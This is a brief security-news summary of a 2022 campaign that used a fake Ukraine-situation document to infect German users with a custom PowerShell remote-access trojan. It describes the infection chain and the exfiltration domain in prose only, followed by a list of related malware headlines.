Security News > 2022 > May > Ukraine supporters in Germany targeted with PowerShell RAT malware
An unknown threat actor is targeting German users interested in the Ukraine crisis, infecting them with a custom PowerShell RAT and stealing their data.
These sites offer malicious documents that install a custom RAT that supports remote command execution and file operations.
Visitors of the site will find a file called "2022-Q2-Bedrohungslage-Ukraine," promising information about the situation in Ukraine and offered for free download. The corresponding section on the site claims that the document is constantly updated with new information, so users are urged to get a fresh copy every day.
In the background the file triggers PowerShell that runs a Base64 deobfuscator leading to fetching and executing a malicious script from the fake site.
Txt file form and a.cmd file that helps execute it through PowerShell.
PowerShell RAT. The custom PowerShell RAT that hides in "Status.txt" begins its malicious operation by collecting basic system information and assigning a unique client ID. This information and anything else stolen from the host computers is exfiltrated to a German domain, "Kleinm[.]de".
News URL
Related news
- Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware (source)
- Russian Hackers Exploit New NTLM Flaw to Deploy RAT Malware via Phishing Emails (source)
- Secret Blizzard Deploys Kazuar Backdoor in Ukraine Using Amadey Malware-as-a-Service (source)
- Germany sinkholes BadBox malware pre-loaded on Android devices (source)
- Germany blocks BadBox malware loaded on 30,000 Android devices (source)
- Germany Disrupts BADBOX Malware on 30,000 Devices Using Sinkhole Action (source)